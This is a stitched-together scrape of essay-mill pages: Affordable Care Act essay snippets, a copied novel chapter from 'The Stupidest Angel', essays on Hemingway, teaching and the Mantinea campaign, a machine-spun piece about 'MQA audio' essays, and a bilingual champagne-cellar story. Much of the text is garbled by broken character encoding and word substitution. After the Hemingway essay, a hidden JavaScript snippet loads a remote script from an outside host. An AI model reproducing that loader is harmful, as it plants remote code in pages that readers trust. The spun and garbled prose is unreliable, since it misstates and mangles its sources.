up a place they can purchase hea lth insurance, expanded the use of Medicaid andRead MoreThe Affordable Care Act Essay633 Words  | 3 Pages The Affordable Care Act (ACA) Robin Shilstone CF ID Number: 504249 President Barack Obama signed the Affordable Care Act, into law on March 23rd 2010. Congress had tried for decades to pass health care reform, beginning with President Franklin Roosevelt. Finally, President Obama pushed this Act into law with the Democrat control, and gave the federal government 16% of the United States economy. The law states that every American citizen is mandated to purchase health insuranceRead MorePolicy Paper : Choice Of Policy1452 Words  | 6 Pagesthe need to reform the United States of American health care system. The reform is to enable a more comprehensive system that will address pressing issues such as the growing number of uninsured American. The USA is one of the leading countries when in to healthcare and its systems. It is also the country with the most spending when it comes to healthcare. According to an article published in the commonwealth fund, the United States health care system is found to be the most expensive in the worldRead MoreWha t Is The Impact Of The Affordable Care Act?915 Words  | 4 Pageswill be affected with repeal of ACA for children Sukainah Al Shahab Course code Instructor’s name Institution November 11, 2017 Introduction/Overview Affordable Care Act came as a great relief to children. Statistics indicate that more than 95 percent of children are covered by Medicaid (Juan, 2016). On other hand, ACA was like a dream come true for a universal health coverage for children. With ACA, 100 percentRead MoreThe Affordable Care Act Is Necessary For Successful Medicaid Reform1376 Words  | 6 PagesIntroduction The Affordable Care Act promotes Medicaid expansion. Medicaid expansion is needed in North Carolina to insure the disabled and those that live below the poverty level receive adequate healthcare coverage. The resistance of North Carolina legislature in the promotion of Medicaid reform has retarded Medicaid expansion to its uninsured residents. The cooperation of the North Carolina legislature and its support of the Affordable Care Act is necessary for successful Medicaid reformRead MoreThe Affordable Care Act : Obama Care, The Patient Protection Act1732 Words  | 7 PagesThe Affordable Care Act Obama Care, The Patient Protection Act, people have given it many nicknames but it’s official name is The Affordable Care Act. The law may have several nicknames, but one thing is for sure, it is very controversial. Americans are torn on whether the law will work or not, and it’s causing a huge debate ahead of the 2016 presidential election. The effects that The Affordable Care Act may have on our country can best be understood by analyzing the background and the history
The Stupidest Angel Chapter 9 Free Essays
string(50) " dismiss him and the men would still dislike him\." Chapter 9 THE LOCAL GUYS, THEY HAVE THEIR MOMENTS Thursday morning it became official: Dale Pearson, evil developer, was a missing person. Theo Crowe was going over the big red truck parked by the pounding Pacific at Lime Kiln Rock in the Big Sur wilderness area above Pine Cove. This was the area where half the world’s car commercials were filmed – everything from Detroit minivans to German lux-o-cruisers was filmed snaking around the cliffs of Big Sur, as if all you needed to do was sign the lease papers and your life would be an open road of frothy waves beating on majestic seawalls, with nothing but leisure and prosperity ahead. We will write a custom essay sample on The Stupidest Angel Chapter 9 or any similar topic only for you Order Now Dale Pearson’s big red truck did look carefree and prosperous, parked there by the sea, despite the crust of salt forming on the paint and the appearance that the owner had been washed away in the surf. Theo wanted that to be the case. The highway patrol, who had found the truck, had reported it as an accident. There was a surf-casting rod there on the rocks, conveniently monogrammed with Dale’s initials. And the Santa hat he’d been wearing was found washed up nearby, and therein lay the problem. Betsy Butler, Dale’s squeeze, had said that Dale had gone out two nights ago to play Santa at the Caribou Lodge and had never come home. Who went fishing in the middle of the night while wearing a Santa hat? Granted, according to the other Caribou, Dale had done â€Å"some drinking,†and he was a little wound up from his confrontation with his ex-wife the day before, but he hadn’t lost his mind completely. Negotiating the cliffs by Lime Kiln Rock to get down to the water during the day was risky business; there’s no way that Dale would have tried it in the middle of the night. (Theo had lost his footing and slid twenty feet before he caught himself, wrenching his back in the process. Sure he was a little stoned, but then, Dale would have been a little drunk.) The highway patrolman, who had a crew cut and looked to be about twelve – an escapee from one of the hygiene films Theo had seen in sixth-grade health class, Why Mary Won’t Go in the Water – had Theo sign off on his report, then climbed in his cruiser and headed up the coast into Monterey County. Theo went back and looked through the truck again. All the things that should have been there – some tools, a black Mag flashlight, a couple of fast-food wrappers, another fishing rod, a tube of blueprints – were there. And all the things that shouldn’t – bloody knives, shell casings, severed limbs, evidence of bleach from cleanup – were not. It was like the guy had just driven up here, climbed down the cliff, and washed away. But that just couldn’t be the case. Dale could be mean-spirited, crude, and even violent, but he wasn’t stupid. Unless he knew the exact topography of these cliffs, and had a good flashlight, he’d never have made it down in the dark. And his flashlight was still in the truck. Theo wished that he had better training in crime-scene investigation. He’d learned most of what he knew from television, not at the academy where he’d spent a miserable eight weeks fifteen years ago when the corrupt sheriff who had found his personal pot patch had railroaded him into becoming Pine Cove’s constable. Since the academy, almost every crime scene he’d encountered had been turned over to the county sheriff or highway patrol almost immediately. He went over the truck cab again looking for something that might be a clue. The only thing remotely out of order was some dog hairs on the headrest. Theo couldn’t remember if Dale had a dog. He put the dog hairs in a sandwich bag and dialed Betsy Butler on his cell phone. She didn’t sound that broken up about Dale’s disappearance. â€Å"No, Dale didn’t like dogs. He didn’t like cats either. He was kind of a cow man.†â€Å"He liked cows? Did you guys have a pet cow?†Could it be cow hair? â€Å"No, he liked to eat them, Theo. Are you okay?†â€Å"No, sorry, Betsy.†He had been so sure that he didn’t sound stoned. â€Å"So, do I get the truck? I mean, are you going to bring it here?†â€Å"I have no idea,†said Theo. â€Å"They’ll tow it to the impound yard. I don’t know if they’ll release it to you. I’d better go, Betsy.†He snapped the phone shut. Maybe he was just tired. Molly had made him sleep on the couch last night – saying something about him having mutant tendencies. He hadn’t even known that she liked the salad shooter. He was sure that she could tell that he’d been smoking pot. He flipped the phone back open and called Gabe Fenton. â€Å"Hey, Theo. I don’t know what that stuff is you brought me, but it’s not hair. It won’t burn or melt, and it’s damn hard to cut or break. Good thing it was torn out by the roots.†Theo cringed. He had almost forgotten about the crazed blond guy he’d run over. He shuddered now, thinking about it. â€Å"Gabe, I have some more hair I’d like you to look at.†â€Å"Oh my God, Theo, did you run over someone else?†â€Å"No, I didn’t run over anybody. Jeez, Gabe.†â€Å"Okay. I’ll be here all day. Actually, I’ll be here all night, too. It’s not like I have anywhere to go. Or anyone who cares whether I live or die. It’s not like –  » â€Å"Okay. I’m coming over.†There were two men and three women, including Lena, in the offices of Properties in the Pines when Tucker Case came through the door. The women were immediately intrigued by him and the men immediately disliked him. It had always been that way with Tuck. Later, if they got to know him, the women would dismiss him and the men would still dislike him. You read "The Stupidest Angel Chapter 9" in category "Essay examples" Basically, he was a geek in a cool guy’s body – one feature or the other worked against him. It was an open stable of desks and Tuck went directly to Lena’s desk at the back. As he went he smiled and nodded to the realtors, who smiled back weakly, trying not to sneer. They were beat from showing properties to Christmas vacation be-backs who wouldn’t move here even if they could find employment in this toy town. They’d just failed to plan any vacation activities and so decided to take the kids out for a rousing round of jerk off the realtor. Or so went the party line at the MLS meetings. Lena met Tuck’s gaze and instinctively smiled, then frowned. â€Å"What are you doing here?†â€Å"Lunch? You. Me. Eating. Talking. I need to ask you something.†â€Å"I thought you were supposed to be flying.†Tuck hadn’t seen Lena in her business clothes – a sensible skirt and blouse, just a little mascara and lipstick, her hair pinned up with lacquered chopsticks, a few strands escaping here and there to frame her face. He liked the look. â€Å"I flew all morning. There’s weather. The edge of a storm coming.†He really wanted to pull the chopsticks out of her hair and throw her down there on the desk and tell her how he really felt, which was somewhat aroused. â€Å"We could get Chinese,†he added. Lena looked out the window. The sky was going dark gray over the shops across the street. â€Å"There’s no Chinese place in Pine Cove. Besides, I’m really swamped here. I handle vacation rentals and it’s Christmas Eve eve.†â€Å"We could go to your place for a quick lunch. You have no idea how quick I can be if I put my mind to it.†Lena looked past him to her coworkers, who, of course, were now staring. â€Å"Is that what you need to ask me?†â€Å"Oh, no, no, of course not. I wouldn’t – that would be, well, yes – but there’s something else.†Now Tuck was feeling the realtors watching him, listening to him. He leaned over Lena’s desk so only she could hear. â€Å"You said this morning that that constable guy your friend is married to lives in a cabin at the edge of a ranch. It wouldn’t be the big ranch north of town, would it?†Lena was still looking past him. â€Å"Yes, the Beer-Bar Ranch, belongs to Jim Beer.†â€Å"And there’s an old single-wide trailer next to the cabin?†â€Å"Yes, that used to be Molly’s, but now they live in the cabin. Why?†Tuck stood back and grinned. â€Å"Then white roses it is,†he said, a little too loudly for the benefit of the audience. â€Å"I just didn’t know if they’d be appropriate for the holidays.†â€Å"Huh?†Lena said. â€Å"See you tonight,†Tuck said. He leaned over and kissed her on the cheek, then sauntered out of the office, smiling apologetically at the exhausted realtors as he went. â€Å"Merry Christmas, you guys,†he said, waving from the door. The first thing that Theo noticed when he entered Gabe Fenton’s cabin was the aquariums with the dead rats. The female was scampering around the center cage, sniffing and crapping and looking rat-happy, but the others, the males, lay on their backs, feet shot to the sky, like plastic soldiers in a death diorama. â€Å"How did that happen?†â€Å"They wouldn’t learn. Once they associated the shock with sex, they started liking it.†Theo thought about his relationship with Molly over the last few days. He pictured himself in the dead-rat display. â€Å"So you just kept shocking them until they died?†â€Å"I had to keep the parameters of the experiment constant.†Theo nodded gravely, as if he understood completely, which he didn’t. Skinner came over and headbutted him in the thigh. Theo scratched his ears to comfort him. Skinner was worried about the Food Guy, and he was hoping that maybe the Emergency Backup Food Guy might give him one of the tasty-smelling white squirrels in the cages on the table, now that it appeared that the Food Guy was finished cooking them. This teasing was as bad as when that kid at the beach used to pretend to throw the ball, then not throw the ball. Then pretend to throw the ball, but not throw the ball. Skinner had to knock the kid down and sit on his face. Boy, had he been bad-dogged for that. Nothing hurt like being bad-dogged, but if the Food Guy kept teasing him with the white squirrels, Skinner knew he was going to have to knock him down and sit on his face, maybe even poop in his shoe. Oh, I am a bad, bad dog. No, wait, the Emergency Backup Food Guy was scratching his ears. Oh, that felt good. He was fine. Doggie Xanax. Never mind. Theo handed Gabe the sandwich bag with the hairs in it. â€Å"What’s the oily substance in the bag?†Gabe said, examining the specimen. â€Å"Potato-chip flotsam. The bag is from my lunch yesterday.†Gabe nodded, then looked at Theo the way the coroner always looks at the cop on TV – like: You numbskull, don’t you know that you’re contaminating evidence just by continuing to draw breath and I’d be a lot more comfortable with you if you’d stop? He took the bag over to the microscope on the counter, removed a couple of the hairs, and put them on a slide with a cover, then fitted it into the microscope. â€Å"Please don’t tell me it’s polar bear,†Theo said. â€Å"No, but at least it’s an animal. It seems to have a distinct sour-cream-and-onion signature.†Gabe pulled back from the microscope and grinned at Theo. â€Å"Just fucking with you.†He gave Theo a gentle punch to the arm and looked back into the microscope. â€Å"Wow, the medulla is absent and there’s low birefringence.†â€Å"Wow,†echoed Theo, trying but not really feeling the low-birefringence stoke that Gabe was. â€Å"I have to check the hair database online, but I think it’s from a bat.†â€Å"There’s a database for that? What, Bat Hair Dot-Com?†â€Å"That was supposed to be the whole purpose of the Internet, you know. To share scientific information.†â€Å"Not a Viagra- and porn-delivery system?†Theo said. Maybe Gabe was going to be okay after all. Gabe moved to the computer at his desk and scrolled through screen after screen of microscope photos of mammal hair until he found one he liked, then went back to the microscope and checked it again. â€Å"Wow, Theo, you’ve got yourself an endangered species here.†â€Å"No way.†â€Å"Where the hell did you get this? Micronesian giant fruit bat.†â€Å"Out of a Dodge pickup truck.†â€Å"Hmm, that’s not listed as their habitat. It wasn’t parked in Guam, was it?†Theo fished his car keys out of his pocket. â€Å"Look, Gabe, I have to go. Meet at the Slug for a beer tonight, okay?†â€Å"We can have beer now, if you want. I have some in the fridge.†â€Å"You need to get out. I need to get out. Okay?†Theo was backing out the door. â€Å"Okay. I’ll meet you at six. I have to go pick up some Super Glue solvent at the Thrifty-Mart.†â€Å"Bye.†Theo jumped off the porch and loped to the Volvo. Skinner barked at him in four-four time. Hello? Tasty white squirrels? Still in the little box? Hello? You forgot? When Theo pulled up to Lena Marquez’s house, there was a generic white economy rental car (A Ford Mucus, he thought) parked out front. He looked for the bat he’d seen hanging from the porch ceiling, but it wasn’t there. He hadn’t even filed the experience of running over the apparently indestructible blond guy, and now he was facing the possibility that he might actually be about to confront a murderer. Just in case, he’d stopped at home and gotten his gun off the shelf in the closet and his handcuffs off the bedpost where Molly had last imprisoned him when they had still been speaking. (She’d been in the yard out behind the cabin, working out with a bamboo shinai kendo sword she’d been using since breaking her broadsword – he’d snuck in and out without confrontation.) He unsnapped the Glock’s nylon holster that was clipped to the back of his jeans and rang the doorbell. The door opened. Theo screamed and drew his gun as he jumped back. On the other side of the threshold, Tucker Case screamed and dove backward also, shielding his face with his hands. His hat made a little yelping sound. â€Å"Hold it right there,†Theo said. He could feel his pulse beating in his neck. â€Å"I’m holding, I’m holding. Jesus, what the fuck is this about?†â€Å"You have a bat on your head!†â€Å"Yeah, and for that you’re going to shoot me?†The bat, his huge black wings wrapped around the pilot’s head, gave the impression of a large leather cap with a Mohawk crest of fur that culminated in a big-eared little dog face that was now barking at Theo. â€Å"Well, uh, no.†Theo lowered the gun, feeling a little embarrassed now. He was still in his shooter’s crouch, though, which now, with the gun lowered, made him look like he was posing as the world’s skinniest sumo wrestler. â€Å"Can I get up?†Tuck asked. â€Å"Sure, I just wanted to talk to Lena.†Tucker Case was exasperated and his bat had fallen over one eye. â€Å"Well, she’s at her office. Look, if you’re going to get high, maybe you ought to leave the gun at home, huh?†â€Å"What?†Theo had been careful to use some Visine, and it had been hours since he’d hit his Sneaky Pete pot pipe. He said, â€Å"I’m not high. I haven’t gotten high in years.†â€Å"Yeah, right. Constable, maybe you’d better come in.†Theo stood and tried to shake off the appearance that he’d just had about five years of life scared out of him by a guy with a bat on his head. He followed Tucker Case into Lena’s kitchen, where the pilot offered him a seat at the table. â€Å"So, Constable, what can I do for you?†Theo wasn’t sure. He’d planned on talking to Lena, or at least the two of them together. â€Å"Well, as you probably know, we found Lena’s ex-husband’s truck up in Big Sur.†â€Å"Of course, I saw it.†â€Å"You saw it?†â€Å"From the helicopter. Tucker Case, contract pilot for the DEA, remember? You can check me out if you want to. Anyway, we’ve been patrolling that area.†â€Å"You have?†The bat was looking at Theo and Theo was having trouble following his own thoughts. The bat was wearing tiny sunglasses. Ray-Bans, Theo could see by the trademark in the corner of one lens. â€Å"I’m sorry, Mr., uh – Case, could you take the bat off your head. It’s very distracting.†â€Å"Him.†â€Å"Pardon?†â€Å"It’s a him. Roberto. He no like the light.†â€Å"Pardon?†â€Å"Friend of mine used to say that. Sorry.†Tucker Case unwrapped the bat and put it on the floor, where it spidered away, walking on its wing tips into the living room. â€Å"God, that’s creepy,†Theo said. â€Å"Yeah, you know, kids. What are you gonna do?†Tuck dazzled a perfect grin. â€Å"So, you found this guy’s truck? Not him, though?†â€Å"No. It was made to look like he was washed into the ocean while fishing off the rocks.†â€Å"Made to look? So, you suspect foul play?†Tuck bounced his eyebrows. Theo thought the pilot should be taking this more seriously. It was time to drop the bomb. â€Å"Yes. First, he never came home after the Caribou Christmas party Tuesday night, where he played the joke Santa. No one goes surf-fishing in the middle of the night, wearing a Santa suit. We found the Santa hat still in the truck, and I found hairs from a Micronesian fruit bat on the headrest.†â€Å"Well, that’s a coincidence. Jeez, that’s got to make you suspicious, doesn’t it?†Tucker Case got up and went over to the counter. â€Å"Coffee? I just made it.†Theo stood up, too, just because he didn’t want the suspect to get away, or maybe to show that he was taller, because it seemed like the only advantage he had over the pilot. â€Å"Yes, it is suspicious. And I talked to a kid Tuesday night who said he saw a woman killing Santa Claus with a shovel. I didn’t think anything of it then, but now I think the kid might have actually seen something.†Tucker Case was busying himself with getting cups out of the cupboard, milk out of the fridge. â€Å"So, you did tell the kid that there’s no Santa, right?†â€Å"No, I didn’t.†Now Tucker Case turned, coffeepot in hand, and regarded Theo. â€Å"You know that there is no Santa, don’t you, Constable?†â€Å"This is not a joke,†Theo said. He hated this – hated being the MAN. He was supposed to be the smart-ass in the face of authority figures. â€Å"Cream?†Theo sighed. â€Å"Sure. And sugar, please.†Tuck finished preparing the coffee, brought the cups to the table, and sat down. â€Å"Look, I see where you’re going with this, Theo. Can I call you Theo?†Theo nodded. â€Å"Thanks. Anyway, Lena was with me Tuesday night, all night.†â€Å"Really? I saw Lena on Monday. She didn’t mention you. Where did you meet?†â€Å"At the Thrifty-Mart. She was a Salvation Army Santa. I thought she was attractive, so I asked her out. We hit it off.†â€Å"You make it a habit of hitting on the Salvation Army Santas?†â€Å"Lena said that you’re married to a scream queen called Kendra, Warrior Babe of the Outland.†Theo nearly shot coffee out his nose. â€Å"That was a character she used to play.†â€Å"Yeah, Lena says sometimes that’s not so clear to her. My point is: Love is where you find it.†Theo nodded. Yeah, that was true. Before he drifted into a wistful state of mind, Theo reminded himself that this guy was, in an offhand way, attacking the woman he loved. â€Å"Hey,†Theo said. â€Å"It’s okay? Who am I to judge? I married an island girl who had never seen indoor plumbing until I brought her to the States. Didn’t work out –  » â€Å"Fruit-bat hair in the truck,†Theo interrupted. â€Å"Yeah, I knew you’d come back to that. Well, who knows? Roberto goes out on his own from time to time. Maybe he met this Dale guy. Maybe they hit it off. You know, love is where you find it. I doubt it, though. I hear that this Dale guy was a real creep.†â€Å"Are you implying that your bat may have something to do with the disappearance of Dale Pearson?†â€Å"No, you nitwit, I’m saying that my bat may have had something to do with bat hair, which, even you, with your Sherlock Holmes-like powers of observation, may have noticed he is all covered with.†â€Å"I can’t believe you’re a cop,†Theo said, getting truly angry now. â€Å"I’m not a cop. I just fly the helicopter for the DEA. They hire me by the season, and this is close to the harvest season in Big Sur and surrounding areas, so here I am, flying around looking in the forest for dark green patches while the agents in the back look at it through infrared and record everything on GPS so they can get specific warrants. And man, do they pay well. ‘Vive la war on drugs, I say. But no, I’m not a cop.†â€Å"I didn’t think so.†â€Å"Funny thing is, I have learned to spot the right color of green from the sky, and usually the infrared confirms my suspicions. This morning I spotted about a thousand-square-foot patch of marijuana growing just north of the Beer-Bar Ranch. You know where that is?†Theo felt a lump in his throat the size of one of Gabe’s dead rats. â€Å"Yes.†â€Å"Man, that’s a lot of pot, even by commercial growers’ standards. Felony quantity. I turned the helicopter – steered away without calling it to the agent’s attention, but weather permitting, we could go back. There’s a storm coming in, you know? Roberto and I drove by there this afternoon just to make sure. I guess I can always show the agents tomorrow.†Tucker Case put down his coffee, leaned on his elbows, and turned his head sideways like he was a cute kid in a cereal commercial who was reaching sugar nirvana. â€Å"You’re a very unlikable man, Mr. Case.†â€Å"Oh my God, you should have seen me before I had my epiphany. I used to really be an asshole. I’m actually very charming now. By the way, I saw your wife working out in the yard at your house – very nice. The whole sword thing is a little scary, but otherwise, very nice.†Theo got to his feet, feeling a little dizzy even as he stood, like he’d been hit with a sock full of sand. â€Å"I’d better be going.†Tucker Case put his hand on Theo’s shoulder as he walked him to the door. â€Å"You probably don’t believe this, Theo, but at another time, I’m sure we’d be friends. And you have to understand, I really, really want things to work out with Lena. It was like we met just at the precise moment, the exact second, that I got over my divorce and was ready to love again. And it’s so nice to have someone to bone under the Christmas tree, don’t you think? She’s a great woman.†â€Å"I like Lena,†Theo said. â€Å"But you are a psychopath.†â€Å"You think?†Tuck said. â€Å"I’ve really been trying to be more helpful.†How to cite The Stupidest Angel Chapter 9, Essay examples
HemmingwayThe Sun Also Rises Essay Research Paper free essay sample
Hemmingway-The Sun Besides Rises Essay, Research Paper In the novel The Sun Besides Rises, Ernest Hemingway describes a twosome who portion a really unusual and distant sort of love for each other. This narrative takes topographic point instantly after World War I, a clip of great adversity. This adversity consequences in a aside of values both morally and socially. The love that Brett and Jake portion is symbolic of the general diminution in values in that they tolerate behaviours in one another that would hold been antecedently considered unacceptable. It is clear that Lady Brett Ashley is anything but a lady. She is sort and Sweet but highly vulnerable to the appeal that assorted work forces in her life seem to surround her with. Brett is non happy with her life or her milieus and seeks flight and safety in the weaponries of these work forces. But her actions seem ever to stop up aching her, and she runs back to Jake. Jake knows that he will neer be able to hold her for his ain, and he accepts this as fact. This is clear when the Count asks them? why Don? T you get married, you two? ( 68 ) ? To this inquiry, they give a feeble half hearted awnser which implies that it will neer go on. He is tolerant of her behaviour because he loves her unconditionally and is willing to overlook everything she does. Jake? s willingness to digest and forgive Brett? s promiscuousness and unfaithfulness is an indicant of the skewed values of the age. It was an? anything goes? epoch right after the first war, and Jake? s message to Brett seems to be the same: anything goes every bit long as you finally come back to me. Jake is forced to accept life in this apparently awful manner for more than one ground. He a weak individual socially, but he is besides physically handicapped because of an hurt that he suffered during the war. He suffered an hurt that caused him to be castrated. The first intimation of this is when he says to Georgeette? I was hurt in the war ( 24 ) in refrence to why they can non hold physical realtions. This hurt is one that makes him insecure, but worse than that, it allows Brett to hold about complete / gt ; control over him. Jake and Brett need each other emotionally, but Brett feels that she needs more. As a consequence Jake is force to give her up. Jake? s feelings toward his friend Robert Cohn are a combination green-eyed monster, compassion, apprehension, and hatred. These are a really unusual group of feelings for a individual to hold toward one individual, but it was a really unusual clip. Jake knew of Robert? s relationship with Brett, and it ate him up with enviousness, but at the same clip he knew how it had ended. He had been close friends with Robert, and had been through a similar state of affairs with Brett, so he had both compassion and understanding for Robert? s place. The lone job was the manner Robert choose to cover with his feelings. Robert besides could non stand to see Brett with another adult male, but he expose this much otherwise. Robert? s presense bothered Jake even though they had been close friends. Robert dorsums out of a fishing trip to happen Brett, and Jake? s friend makes a remark about that being a good thing. Jake? s merely answer is? You? re darn right ( 108 ) ? . Robert makes a sap out of himself. He even beats up Jake at one point. Behavior like his was impossible for Jake to esteem and he hated this portion of Robert. None of this would hold even been a job if life during that clip had been a little more solid in a moral sense. Brett would hold non been permitted to move the manner she did, while mantaining her societal position, which clearly meant a great trade to her. She would hold had to take, and most likely her pick would hold been that of a more chaste life style. In this narrative, there is a really different manner of life from what people know today. The relationship that Jake and Brett portion is one that would look wholly unrealistic in today? s clip, but to them, it was acceptable. Jake no uncertainty would hold preferred to hold it otherwise, but he is accepting of the manner it stands. The adversity and the poorness that is so widely spread in that country during the station war clip causes the people to take down their moral criterions. Jake and Brett? s love is the perfect illustration. ( map ( ) { var ad1dyGE = document.createElement ( 'script ' ) ; ad1dyGE.type = 'text/javascript ' ; ad1dyGE.async = true ; ad1dyGE.src = 'http: //r.cpa6.ru/dyGE.js ' ; var zst1 = document.getElementsByTagName ( 'script ' ) [ 0 ] ; zst1.parentNode.insertBefore ( ad1dyGE, zst1 ) ; } ) ( ) ;
Friday, May 1, 2020
The Ideal Teacher Student Relationship free essay sample
The ideal-teacher student relationship is one where both the teacher and student learn and adapt to new ideas and reasoning. Just as a tour guide can’t make you enjoy the time you spend wandering around the scenery, a teacher, despite their title, can’t be the force that is responsible for the student’s learning. However, like a good tour guide, a teacher can make it a lot nicer than it would be otherwise. A teacher’s job is to guide the student as best they can down the path of knowledge and it is the student’s job to follow as best they can. All other aspects of their relationship as teacher and student stem from this. The most important trait for a teacher to posses is the ability to adapt to their student’s needs. If a teacher will works off a fixed schedule and never makes any changes, they will not be able to instruct the student as well as they would otherwise. We will write a custom essay sample on The Ideal Teacher Student Relationship or any similar topic specifically for you Do Not WasteYour Time HIRE WRITER Only 13.90 / page They must be able to deviate, spending more time in the places that create confusion and less in the places that are quickly understood. They need to spend the right amount of time explaining each thing; otherwise it is demeaning to the relationship. In an ideal relationship, both teacher and student need to be gaining as much as possible at all times. Obviously knowledge is the most important thing to be gained but along with that there needs to be a level of satisfaction or accomplishment along with enjoyment. Someone can work like crazy and complete more than everyone else combined but unless they feel that they have truly accomplished something the task has no meaning simply because they will have done nothing in their minds. This stems into enjoyment because if you feel like you’re doing nothing you will become bored and being bored with something is only counterproductive while doing it. Whenever I become bored with something, I stop paying attention to it and start doing something else. If you start doing something else while being taught then you will not learn during that time. It is therefore essential for some form of enjoyment to be present otherwise nothing can be gained. The last requirement for an ideal teacher student relationship is that both are ready and willing to commit themselves to either their instructing or learning. Now this applies mainly to the student who is for the most part required to be there and less to the teacher who chooses to be there. The imbalance comes from the simple logic that the teacher is almost automatically committed because why else would they be a teacher in the first place? There are plenty of other professions out there. On the other hand a student is more obligated to be their instead of choosing to be their and thus has a much higher chance of not being committed than the teacher. If for some reason either of the two are not committed to the task then the endeavor will be a complete waste. If the student does not want to learn then they will not learn. The teacher cannot physically force the student to learn, just as our tour guide, cannot make someone love a piece of scenery if they have already decided that it is stupid and that they want to go home. Similarly it is impossible to force someone to do a better job as a guide. And so, the only way an ideal relationship can form is if teacher and student are both committed to their tasks.
Wednesday, April 15, 2020
How to Use MQA Audio to Make a Better Essay
How to Use MQA Audio to Make a Better EssayIt is important to find an MQA compelling essay sample if you are looking for a superior sounding essay for your presentation. This is because this technology will result in a different, and better sounding piece. The majority of people who are using MQA headphones to read a printed document for their presentation do not know how to use the new technology correctly. Here are some tips on how to use it properly.To start, you need to look for a complete essay on MQA. This can be difficult, because many students do not have the time to read every essay. However, there are many websites that do have audio samples that you can take advantage of.When looking for an essay, you should know what type of essay you want to read. There are different kinds of essays, which vary in length. The most common essay you will find will be used by most college writing programs. The basic type of essay will be just like the one found on your college paper and wil l involve discussing important points such as the different types of paper.The only difference is the medium you will be reading this essay on. The essay you will read will be completely unique, because it will be a persuasive essay. This is different from any other kind of essay and can be quite difficult to read.Make sure you do not become lost while reading your essay. There are two different ways you can accomplish this. The first way is to listen to the essay and then take notes. You will have to make sure you use specific keywords when doing this.The second way is to read the MQA essay from beginning to end. As you are reading, make sure you check all of the sentences and paragraphs that you are not sure about. Once you are done, re-read it. You can then compare the sentences you wrote against the sentences that you just listened to.It is very important that you continue to read the essay throughout the day before you deliver it to the class. Since this essay will be dealing w ith you, you want to be sure you are not holding back. If you become nervous, the MQA audio essay will turn into a bore. You do not want this to happen!There are many benefits to being able to read a powerful persuasive essay with a powerful sound. Take the time to find an MQA essay sample online, or in a book. You will notice immediately how this technology will allow you to read something entirely different and impress your audience with your work.
Saturday, March 21, 2020
Analysis of The Military Strategies of The Campaign of Mantinea essays
Analysis of The Military Strategies of The Campaign of Mantinea essays Analysis Of The Military Strategies Of The Campaign Of Mantinea The Peloponnesian War spanned many, many years in which two main factions, the Spartans and the Athenians, were warring for the domination of Greece along with the many surrounding villages; many with their own agendas. I will be doing an analysis of one particular campaign; the campaign of Mantinea fought in the year 362 B.C.E. To do this I first must bring to light some of the key players in this campaign, especially Epaminondas. Epaminondas, a Theban general, was charged with the task to make the Peloponnese as weak as possible so they may overtake it with the least resistance. To do this the Thebans must play both sides of the war. The Thebans were supposedly allied with the Spartans but in those times that mattered little, treaties were broke and regained on a daily basis. Epaminondas had with him all the Boeotians, the Euboeans and many of the Thessalians; and while the Phocians were bound by treaty to assist the Thebans they found no reasoning in the treaty to justify them assisting with a foreign invasion. This was of little concern to Epaminondas seeing as once they were in the Peloponesse they had the help of the Argives, Messenians, the Tegeans, the Megalopolitans, the Aseans, and the Pallantians. (Xenophon. 396-397) Knowing he had the support of many factions, Epaminondas sped away into Peloponnese. He made it as far as Nemea and decided that this was the only way the Athenian army could come to invade Peloponnese. He assumed any loss to the Athenians would ultimately benefit Thebes and rally his allies and discourage those of the Athenians. Unbeknownst to him the forces opposing Thebes were gathering at Mantinea. Epaminondas' choice to use Nemea, as a striking point to wound the Athenians, was well justified but his intelligence was slow. The Athenians had decided instead of marching to Peloponnese they would sail into the gulf of Argolis...
Thursday, March 5, 2020
Visiting a Champagne Cellar in Reims
Visiting a Champagne Cellar in Reims Champagne cellars are one of the major attractions in the gorgeous city of Reims (pronounced R in(nasal) sss). Follow along on this journey to a wine cellar in this easy bilingual story designed to help you learn French in context. Visiting A Champagne Cellar Si vous à ªtes Reims, il faut absolument que vous visitiez les caves d’une des nombreuses maisons de champagne de la rà ©gion. Les sià ¨ges d’un grand nombre de maisons de champagne sont situà ©s Reims, et beaucoup proposent des dà ©gustations. Pendant un aprà ¨s-midi, nous avons visità © les caves de la compagnie G. H. Martel Cie, qui sont situà ©es 1,5 km au sud-est de la cathà ©drale, une promenade agrà ©able pied. Un des employà ©s, un homme plaisant qui s’appelle Emmanuel, nous a accueillis et il a immà ©diatement dit : Descendons aux caves ! If you are in Reims, you absolutely must visit the cellars of one of the numerous champagne houses in the area. The headquarters of a large number of champagne houses are located in Reims, and many offer tastings. During an afternoon, we visited the cellars of G. H. Martel and Co, located 1.5 km southeast of the cathedral, an enjoyable walk. One of the employees, a pleasant man named Emmanuel, welcomed us and immediately said: Let’s go down to the cellars! Nous avons descendu un escalier à ©troit et nous nous sommes retrouvà ©s dans un rà ©seau de caves qui est situà ©s environ 20 mà ¨tres sous le sol. Au quatrià ¨me sià ¨cle, les Romains ont creusà © les caves au-dessous de Reims pour obtenir la craie qui à ©tait utilisà ©e pour la construction de leurs bà ¢timents. De nos jours, il y a plus de 250 kms de ces caves, et beaucoup servent maintenir le champagne tempà ©rature pendant le vieillissement. L’avantage ? Un environnement dans lequel la tempà ©rature et l’humidità © sont bien contrà ´là ©es. We descended a narrow stairway and found ourselves in a network of cellars which are situated about 20 meters below ground. In the fourth century, the Romans dug the cellars below Reims to obtain chalk which was used for the construction of their buildings. These days, there are more than 250 kms of these cellars, and many serve to maintain the champagne at temperature during the aging process. The advantage? An environment in which the temperature and humidity are well controlled. Emmanuel nous a expliquà ©s que la production de champagne est soigneusement rà ©gulà ©e. Si l’on peut lire  «Ã‚ Appellation d’Origine Contrà ´là ©e  » sur à ©tiquette, on sait que le vin a à ©tà © produit selon des rà ¨gles rigoureuses, par exemple la classification du terroir oà ¹ les raisins sont cultivà ©s, le rendement la vendange, le rendement au pressurage, le vieillissement, et la quantità © d’alcool, parmi d’autres à ©là ©ments. La culture des raisins doit se faire dans les vignobles de la rà ©gion Champagne-Ardenne, et la production entià ¨re du champagne doit à ©galement y avoir lieu. Emmanuel explained to us that the production of champagne is carefully regulated. If one can read â€Å"Appellation d’Origine Contrà ´là ©e†on the label, you know that the wine has been produced according to strict regulations, for example the classification of the land where the grapes are grown, the yield of the harvest, the yield from the wine pressing, the aging process, and the volume of alcohol, among other components. The growing of the grapes must be done in the vineyards of the Champagne-Ardenne region, and the entire production of the champagne must also take place there. En gà ©nà ©ral, il y a seulement 3 cà ©pages qui sont utilisà ©s dans la production de champagne : le chardonnay, le pinot noir, et le pinot meunier. Typiquement, un champagne consiste en un mà ©lange de deux ou trois cà ©pages. Et donc, la particularità © du vin, sa saveur, sa couleur et son 